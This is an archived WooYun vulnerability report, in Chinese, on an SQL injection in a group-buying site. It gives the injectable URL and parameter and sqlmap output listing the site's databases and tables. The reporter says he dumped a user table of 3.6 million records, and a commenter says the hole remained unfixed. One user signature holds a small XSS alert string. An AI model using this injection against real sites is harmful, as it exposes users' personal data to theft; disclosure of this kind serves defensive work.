当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061029

漏洞标题:爱丽网sql注射漏洞

相关厂商:aili.com

漏洞作者: 卡卡

提交时间:2014-05-16 16:19

修复时间:2014-06-30 16:20

公开时间:2014-06-30 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-16: 细节已通知厂商并且等待厂商处理中
2014-05-16: 厂商已经确认,细节仅向厂商公开
2014-05-26: 细节向核心白帽子及相关领域专家公开
2014-06-05: 细节向普通白帽子公开
2014-06-15: 细节向实习白帽子公开
2014-06-30: 细节向公众公开

简要描述:

美女就是会骗钱,上次一美女同事吃完饭,跟我说她忘带钱包,要我打的送她回家,她拿钱还我,当我傻,那么远,我打的回来不要钱啊,又想占我便宜,下次再这样要求,我最少要她补我回来车费!

详细说明:

问题站点:

http://tuan.aili.com/


注射链接:

http://tuan.aili.com/ajax/system.php?id=17871&title=%5B%E4%B8%9C%E7%9B%B4%E9%97%A8%5D+%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E4%BB%85%E5%94%AE29%E5%85%83%2C%E4%BB%B7%E5%80%BC300%E5%85%83%E5%87%BB%E5%89%91%E4%BD%93%E9%AA%8C%E8%AF%BE1%E8%8A%82!%E5%9B%BD%E5%AE%B6%E7%BA%A7%E8%BF%90%E5%8A%A8%E5%91%98%E4%B8%93%E4%B8%9A%E6%8E%88%E8%AF%BE%2C%E4%B8%BA%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84%E6%84%9F%E5%8F%97!%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E6%AC%A2%E8%BF%8E%E6%82%A8%E7%9A%84%E5%88%B0%E6%9D%A5!&team_id=57826&action=showbaidumap


由于对参数id没过滤,造成注射

.png


库:

available databases [3]:
[*] information_schema
[*] test
[*] tuan


当前库:tuan
表:

Database: tuan
[108 tables]
+--------------------------+
| order                    |
| user                     |
| accoutlog                |
| address                  |
| advert                   |
| area_team                |
| ask                      |
| biz_team                 |
| branch                   |
| brand_list               |
| brands                   |
| business                 |
| card                     |
| cart                     |
| category                 |
| cenwor_tttuangou_regions |
| chosen                   |
| city                     |
| citylist                 |
| code                     |
| collect                  |
| coupon                   |
| cps360_order             |
| cps_baidu                |
| cps_baidu1130            |
| cps_duba                 |
| cpsorder                 |
| credit                   |
| ctrip_group_coupon       |
| ctrip_group_detail       |
| ctrip_group_detail_bk    |
| ctrip_group_info         |
| ctrip_group_info_bk      |
| ctrip_group_order        |
| daysign                  |
| daysign1                 |
| del_order                |
| ecs_region               |
| express_cdp              |
| feedback                 |
| flow                     |
| friendlink               |
| fx_team                  |
| goods                    |
| groupon                  |
| groupon_coupon           |
| groupon_order_list       |
| hz_team                  |
| invite                   |
| logger_admin             |
| lookoocps                |
| lottery_list             |
| mailer                   |
| manager_action           |
| managers                 |
| navigation               |
| news                     |
| order_comments           |
| outsite_voucher          |
| page                     |
| partner                  |
| partner116               |
| partner_gallery          |
| pass                     |
| pay                      |
| paycard                  |
| picture                  |
| prize_ticket             |
| prize_ticket_win         |
| promotions               |
| rebates_list             |
| recharge_list            |
| recomend_list            |
| record_money             |
| referer                  |
| refund_list              |
| reg_message              |
| salesman                 |
| searchkey                |
| send_paycard_code        |
| send_paycard_team        |
| setcode                  |
| siyu_team                |
| smssubscribe             |
| subcate                  |
| subscribe                |
| system                   |
| t_basic                  |
| team                     |
| team_detail              |
| team_playshall           |
| team_recycle             |
| team_recycle0106         |
| toolsbind                |
| topic                    |
| tuan800cps               |
| vote_feedback            |
| vote_feedback_input      |
| vote_feedback_question   |
| vote_options             |
| vote_question            |
| voucher                  |
| voucher_refund           |
| voucherbk                |
| yiqifa_order             |
| ymh_team                 |
| zhaoshang                |
| zsfeedback               |
+--------------------------+


随便跑了一个user表,360W数据
没什么好说的,赶快修复吧
听说爱丽有礼物~~~嘿嘿

漏洞证明:

.png


库:

available databases [3]:
[*] information_schema
[*] test
[*] tuan


当前库:tuan
表:

Database: tuan
[108 tables]
+--------------------------+
| order                    |
| user                     |
| accoutlog                |
| address                  |
| advert                   |
| area_team                |
| ask                      |
| biz_team                 |
| branch                   |
| brand_list               |
| brands                   |
| business                 |
| card                     |
| cart                     |
| category                 |
| cenwor_tttuangou_regions |
| chosen                   |
| city                     |
| citylist                 |
| code                     |
| collect                  |
| coupon                   |
| cps360_order             |
| cps_baidu                |
| cps_baidu1130            |
| cps_duba                 |
| cpsorder                 |
| credit                   |
| ctrip_group_coupon       |
| ctrip_group_detail       |
| ctrip_group_detail_bk    |
| ctrip_group_info         |
| ctrip_group_info_bk      |
| ctrip_group_order        |
| daysign                  |
| daysign1                 |
| del_order                |
| ecs_region               |
| express_cdp              |
| feedback                 |
| flow                     |
| friendlink               |
| fx_team                  |
| goods                    |
| groupon                  |
| groupon_coupon           |
| groupon_order_list       |
| hz_team                  |
| invite                   |
| logger_admin             |
| lookoocps                |
| lottery_list             |
| mailer                   |
| manager_action           |
| managers                 |
| navigation               |
| news                     |
| order_comments           |
| outsite_voucher          |
| page                     |
| partner                  |
| partner116               |
| partner_gallery          |
| pass                     |
| pay                      |
| paycard                  |
| picture                  |
| prize_ticket             |
| prize_ticket_win         |
| promotions               |
| rebates_list             |
| recharge_list            |
| recomend_list            |
| record_money             |
| referer                  |
| refund_list              |
| reg_message              |
| salesman                 |
| searchkey                |
| send_paycard_code        |
| send_paycard_team        |
| setcode                  |
| siyu_team                |
| smssubscribe             |
| subcate                  |
| subscribe                |
| system                   |
| t_basic                  |
| team                     |
| team_detail              |
| team_playshall           |
| team_recycle             |
| team_recycle0106         |
| toolsbind                |
| topic                    |
| tuan800cps               |
| vote_feedback            |
| vote_feedback_input      |
| vote_feedback_question   |
| vote_options             |
| vote_question            |
| voucher                  |
| voucher_refund           |
| voucherbk                |
| yiqifa_order             |
| ymh_team                 |
| zhaoshang                |
| zsfeedback               |
+--------------------------+


修复方案:

礼物噢~~~

版权声明:转载请注明来源 卡卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-05-16 18:31

厂商回复:

看来这回又被脱干净了

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-16 19:40 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    脱脱更健康,同意的举手。

  2. 2014-05-16 20:17 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    @爱丽网 很可爱的一个厂商 哈哈

  3. 2014-06-06 20:13 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @卡卡 为什么你的sqlmap可以这么长的参数,我的要是这么长直接退出,求发一下你的sqlmap地址

  4. 2014-06-06 20:19 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @爱丽网 很无语,漏洞压根就没修复

  5. 2014-06-06 21:26 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @U神 看不了 无语,得多刷洞 o(︶︿︶)o 唉

  6. 2014-06-06 21:28 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    @U神 我是官网下载的啊

  7. 2014-06-06 21:29 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @卡卡 麻烦发个地址来

  8. 2014-06-06 21:30 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @卡卡 我偷偷关注你很久了。 嗯。。。有几十年了吧

  9. 2014-06-06 21:35 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    @U神 https://github.com/sqlmapproject/sqlmap/tarball/master

  10. 2014-07-08 13:43 | clown岩 ( 实习白帽子 | Rank:42 漏洞数:13 | 哎呀 谁的肥皂? 各位大牛多多关照!陪聊 ...)

    @U神 我用那个绿色免安装版sqlmap也会直接退出 其他的不会